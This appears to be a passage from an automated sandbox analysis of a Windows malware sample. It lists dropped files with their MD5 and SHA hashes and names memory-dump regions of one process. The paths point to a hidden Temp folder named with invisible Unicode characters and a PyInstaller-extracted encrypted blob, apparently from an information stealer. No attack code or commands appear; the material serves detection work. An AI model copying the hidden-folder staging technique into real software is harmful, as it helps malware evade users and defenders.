C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\System\Task List.txt

MD5 ef89dcc69126d98e33381e21b995d1d9
SHA1 40e3008b9f7c3e67379fb70a4939299556f4a988
SHA256 f1e53d651ca3105a3da928ae50734f24d9f870de0dffa9dcc3494cccbf6e1f6e
SHA512 f9ac27d0cffd45a6406854d73c8026f93e5dfa97c9daf998dc730bf55b2a0fff412b8a4a953479a586a9c621d85469d82b13d1977b9e142b7b8de48e0465e0fb

C:\Users\Admin\AppData\Local\Temp\8LMCx.zip

MD5 d4c65f961015bd0b935bd63b4d0a89e8
SHA1 ecf464326b0fa50a40445f0c3499de3ff04ed080
SHA256 6162785cd3b606acd6fb2597ebaccffdacae707ed9dbc40a75089748182123d7
SHA512 b63d413423048abefd6967a48b9d43d93585ddf49e3957de2310408a1979fa5d71089d29f54a17c88205b0a9878ffdf135483b52333f85075358bcc159edff97

memory/4276-342-0x00007FF843C70000-0x00007FF843C89000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 78e977530971296dd770cbf34b30ef4e
SHA1 c2161eaa60d83873e41dc93b2789b4ca4d355424
SHA256 666993a9c799fb54bad5509cc364298aeca941806cb0ce80d393a361281cfe75
SHA512 b555a794fbc4510336f9e6d064ab901fb741b1a32a87c106579d8d1e594014da4f35a93447dc12eb135ae21ba364ae8f231b1c4b41582ccb07d5dd3dd67ef09b

memory/4276-363-0x00007FF840520000-0x00007FF840B09000-memory.dmp

memory/4276-389-0x00007FF843A90000-0x00007FF843AA4000-memory.dmp

memory/4276-391-0x00007FF83FD00000-0x00007FF83FE1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI33762\blank.aes

MD5 a6527436807cf4197428fb4b1620f21a
SHA1 d61cf45554ae7368c36e7faefe077e678d996d69
SHA256 fba97e63cb801b3d5c94c1c7e725ef3551b88850cf23b75663c1581ebf7e1ff7
SHA512 6446833b36a1fc9a2b73890ac6610b6e961c7e63b78a21745c2126c512ec844491ad74cc42b12b492de67808f74c8a8e9906a20c5766ddf54b9c3fd25a6c129b

memory/4276-390-0x00007FF843B50000-0x00007FF843B5D000-memory.dmp

memory/4276-388-0x00007FF83FE80000-0x00007FF8403A0000-memory.dmp

memory/4276-387-0x00007FF843B60000-0x00007FF843C2D000-memory.dmp

memory/4276-386-0x00007FF843C30000-0x00007FF843C63000-memory.dmp

memory/4276-385-0x00007FF844740000-0x00007FF84474D000-memory.dmp

memory/4276-384-0x00007FF843C70000-0x00007FF843C89000-memory.dmp

memory/4276-383-0x00007FF8403A0000-0x00007FF840517000-memory.dmp

memory/4276-382-0x00007FF843C90000-0x00007FF843CB3000-memory.dmp

memory/4276-381-0x00007FF843CC0000-0x00007FF843CD9000-memory.dmp

memory/4276-380-0x00007FF843CE0000-0x00007FF843D0D000-memory.dmp

memory/4276-379-0x00007FF843D10000-0x00007FF843D33000-memory.dmp

memory/4276-378-0x00007FF844D00000-0x00007FF844D0F000-memory.dmp